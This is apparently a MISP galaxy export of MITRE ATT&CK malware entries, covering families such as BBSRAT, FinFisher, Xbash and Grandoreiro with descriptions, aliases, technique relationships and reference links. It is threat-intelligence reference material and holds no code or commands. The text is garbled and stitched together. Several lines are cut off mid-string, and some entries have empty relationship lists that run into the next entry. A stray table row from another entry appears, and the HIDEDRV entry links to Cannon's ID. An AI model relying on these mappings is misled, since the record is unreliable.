- uses: *misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

*Table 4622. Table References*

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</table>
BBSRAT - S0127

[BBSRAT](https://attack.mitre.org/software/S0127) is malware with remote access tool functionality that has been used in targeted compromises. (Citation: Palo Alto Networks BBSRAT)

The tag is: `misp-galaxy:mitre-malware="BBSRAT - S0127"`

BBSRAT - S0127 is also known as:

- BBSRAT

BBSRAT - S0127 has relationships with:

- similar: `misp-galaxy:malpedia="BBSRAT"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"


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KEYMARBLE - S0271

[KEYMARBLE](https://attack.mitre.org/software/S0271) is a Trojan that has reportedly been used by the North Korean government. (Citation: US-CERT KEYMARBLE Aug 2018)

The tag is: misp-galaxy:mitre-malware="KEYMARBLE - S0271"

KEYMARBLE - S0271 is also known as:

• KEYMARBLE

KEYMARBLE - S0271 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
SHUTTERSPEED - S0217

[SHUTTERSPEED](https://attack.mitre.org/software/S0217) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)

The tag is: `misp-galaxy:mitre-malware="SHUTTERSPEED - S0217"`

SHUTTERSPEED - S0217 is also known as:

- SHUTTERSPEED

SHUTTERSPEED - S0217 has relationships with:

- similar: `misp-galaxy:tool="SHUTTERSPEED"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with `estimative-language:likelihood-probability="almost-certain"`

---

Reaver - S0172

[Reaver](https://attack.mitre.org/software/S0172) is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of [Control Panel](https://attack.mitre.org/techniques/T1218/002) items.(Citation: Palo Alto Reaver Nov 2017)

The tag is: `misp-galaxy:mitre-malware="Reaver - S0172"`
Reaver - S0172 is also known as:

- Reaver

Reaver - S0172 has relationships with:

- similar: misp-galaxy:malpedia="Reaver" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 4626. Table References

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</table>
BADNEWS - S0128

[BADNEWS](https://attack.mitre.org/software/S0128) is malware that has been used by the actors responsible for the [Patchwork](https://attack.mitre.org/groups/G0040) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. (Citation: Forcepoint Monsoon) (Citation: TrendMicro Patchwork Dec 2017)

The tag is: `misp-galaxy:mitre-malware="BADNEWS - S0128"`

BADNEWS - S0128 is also known as:

- BADNEWS

BADNEWS - S0128 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 4627. Table References

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<tbody>
<tr>
<td><a href="https://attack.mitre.org/software/S0128">https://attack.mitre.org/software/S0128</a></td>
</tr>
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</table>

**SLOWDRIFT - S0218**

[SLOWDRIFT](https://attack.mitre.org/software/S0218) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) against academic and strategic victims in South Korea. (Citation: FireEye APT37 Feb 2018)

The tag is: *misp-galaxy:mitre-malware="SLOWDRIFT - S0218"*

SLOWDRIFT - S0218 is also known as:

- **SLOWDRIFT**

SLOWDRIFT - S0218 has relationships with:

- similar: misp-galaxy:tool="SLOWDRIFT" with estimative-language:likelihood-
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

Table 4628. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0218">https://attack.mitre.org/software/S0218</a></td>
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<tr>
<td><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></td>
</tr>
</tbody>
</table>

**Dok - S0281**

[Dok](https://attack.mitre.org/software/S0281) steals banking information through man-in-the-middle (Citation: objsee mac malware 2017).

The tag is: `misp-galaxy:mitre-malware="Dok - S0281"`

Dok - S0281 is also known as:

- Dok
- Retefe

Dok - S0281 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Launch Agent - T1543.001" with estimative-language:likelihood-probability="almost-certain"

Table 4629. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0281">https://attack.mitre.org/software/S0281</a></td>
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</table>
FinFisher - S0182

[FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018)

The tag is: `misp-galaxy:mitre-malware="FinFisher - S0182"`

FinFisher - S0182 is also known as:

- FinFisher
- FinSpy

FinFisher - S0182 has relationships with:

- similar: `misp-galaxy:malpedia="FinFisher RAT"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1436" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0182">https://attack.mitre.org/software/S0182</a></td>
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<tr>
<td><a href="http://www.finfisher.com/FinFisher/index.html">http://www.finfisher.com/FinFisher/index.html</a></td>
</tr>
</tbody>
</table>
WINERACK - S0219

[WINERACK](https://attack.mitre.org/software/S0219) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)

The tag is: `misp-galaxy:mitre-malware="WINERACK - S0219"`

WINERACK - S0219 is also known as:

- WINERACK

WINERACK - S0219 has relationships with:

- similar: `misp-galaxy:tool="WINERACK"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"

Table 4631. Table References

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<td><a href="https://attack.mitre.org/software/S0219">https://attack.mitre.org/software/S0219</a></td>
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<tr>
<td><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf</a></td>
</tr>
</tbody>
</table>
PJApps - S0291

PJApps ([https://attack.mitre.org/software/S0291](https://attack.mitre.org/software/S0291)) is an Android malware family. (Citation: Lookout-EnterpriseApps)

The tag is: `misp-galaxy:mitre-malware="PJApps - S0291"`

PJApps - S0291 is also known as:

- PJApps

PJApps - S0291 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448"` with `estimative-language:likelihood-probability="almost-certain"

Table 4632. Table References

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<td><a href="https://attack.mitre.org/software/S0291">https://attack.mitre.org/software/S0291</a></td>
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<tr>
<td><a href="https://blog.lookout.com/blog/2016/05/25/spoofed-apps/">https://blog.lookout.com/blog/2016/05/25/spoofed-apps/</a></td>
</tr>
</tbody>
</table>

RuMMS - S0313

[RuMMS]([https://attack.mitre.org/software/S0313](https://attack.mitre.org/software/S0313)) is an Android malware family. (Citation: FireEye-RuMMS)

The tag is: `misp-galaxy:mitre-malware="RuMMS - S0313"`

RuMMS - S0313 is also known as:

- RuMMS

RuMMS - S0313 has relationships with:

HotCroissant - S0431

[HotCroissant](https://attack.mitre.org/software/S0431) is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.(Citation: US-CERT HOTCROISSANT February 2020) [HotCroissant](https://attack.mitre.org/software/S0431) shares numerous code similarities with [Rifdoor](https://attack.mitre.org/software/S0433).(Citation: Carbon Black HotCroissant April 2020)

The tag is: `misp-galaxy:mitre-malware="HotCroissant - S0431"`

HotCroissant - S0431 is also known as:

- HotCroissant

HotCroissant - S0431 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 4634. Table References

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<td><a href="https://attack.mitre.org/software/S0431">https://attack.mitre.org/software/S0431</a></td>
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<tr>
<td><a href="https://www.us-cert.gov/ncas/analysis-reports/ar20-045d">https://www.us-cert.gov/ncas/analysis-reports/ar20-045d</a></td>
</tr>
</tbody>
</table>

**Downdelph - S0134**

[Downdelph](https://attack.mitre.org/software/S0134) is a first-stage downloader written in Delphi that has been used by [APT28](https://attack.mitre.org/groups/G0007) in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)

The tag is: misp-galaxy:mitre-malware="Downdelph - S0134"

Downdelph - S0134 is also known as:

• Downdelph

• Delphacy

Downdelph - S0134 has relationships with:
Flame - S0143

Flame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)

The tag is: misp-galaxy:mitre-malware="Flame - S0143"

Flame - S0143 is also known as:

- Flame
- Flamer
- sKyWIper

Flame - S0143 has relationships with:

- similar: misp-galaxy:tool="Flame" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Bluetooth - T1011.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"


Table 4636. Table References

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<td><a href="https://attack.mitre.org/software/S0143">https://attack.mitre.org/software/S0143</a></td>
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<tr>
<td><a href="https://securelist.com/the-flame-questions-and-answers-51/34344/">https://securelist.com/the-flame-questions-and-answers-51/34344/</a></td>
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<tr>
<td><a href="https://www.symantec.com/connect/blogs/flamer-recipe-bluethothache">https://www.symantec.com/connect/blogs/flamer-recipe-bluethothache</a></td>
</tr>
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</table>

**Xbash - S0341**

[Xbash](https://attack.mitre.org/software/S0341) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://attack.mitre.org/software/S0341) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.(Citation: Unit42 Xbash Sept 2018)

The tag is: *misp-galaxy:mitre-malware="Xbash - S0341"*

Xbash - S0341 is also known as:

• Xbash

Xbash - S0341 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

**Table 4637. Table References**

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<td><a href="https://attack.mitre.org/software/S0341">https://attack.mitre.org/software/S0341</a></td>
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</table>

**Final1stspy - S0355**

[Final1stspy](https://attack.mitre.org/software/S0355) is a dropper family that has been used to deliver [DOGCALL](https://attack.mitre.org/software/S0213).(Citation: Unit 42 Nokki Oct 2018)

The tag is: `misp-galaxy:mitre-malware="Final1stspy - S0355"`

Final1stspy - S0355 is also known as:

- Final1stspy

Final1stspy - S0355 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0351">Cannon</a></td>
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</table>

**Cannon - S0351**

[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)

The tag is: `misp-galaxy:mitre-malware="Cannon - S0351"`

Cannon - S0351 is also known as:

- Cannon

Cannon - S0351 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-
HIDEDRV - S0135

[HIDEDRV](https://attack.mitre.org/software/S0351) is a rootkit used by [APT28](https://attack.mitre.org/groups/G0007). It has been deployed along with [Downdelph](https://attack.mitre.org/software/S0134) to execute and hide that malware. (Citation: ESET Sednit Part 3) (Citation: Sekoia HideDRV Oct 2016)

The tag is: `misp-galaxy:mitre-malware="HIDEDRV - S0135"

HIDEDRV - S0135 is also known as:

- HIDEDRV

HIDEDRV - S0135 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Rootkit - T1014"` with estimative-language:likelihood-probability="almost-certain"
DualToy - S0315

DualToy ([https://attack.mitre.org/software/S0315](https://attack.mitre.org/software/S0315)) is Windows malware that installs malicious applications onto Android and iOS devices connected over USB. (Citation: PaloAlto-DualToy)

The tag is: `misp-galaxy:mitre-malware="DualToy - S0315"`

DualToy - S0315 is also known as:

- DualToy

DualToy - S0315 has relationships with:

- similar: `misp-galaxy:malpedia="DualToy (Android)"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458"` with `estimative-language:likelihood-probability="almost-certain"`

### Table 4641. Table References

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<td><a href="https://attack.mitre.org/software/S0315">https://attack.mitre.org/software/S0315</a></td>
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Grandoreiro - S0531

Grandoreiro ([https://attack.mitre.org/software/S0531](https://attack.mitre.org/software/S0531)) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro]([https://attack.mitre.org/software/S0531](https://attack.mitre.org/software/S0531)) has confirmed victims in Brazil, Mexico, Portugal, and Spain. (Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)

The tag is: `misp-galaxy:mitre-malware="Grandoreiro - S0531"`

Grandoreiro - S0531 is also known as:

- Grandoreiro

Grandoreiro - S0531 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with
estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with
• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

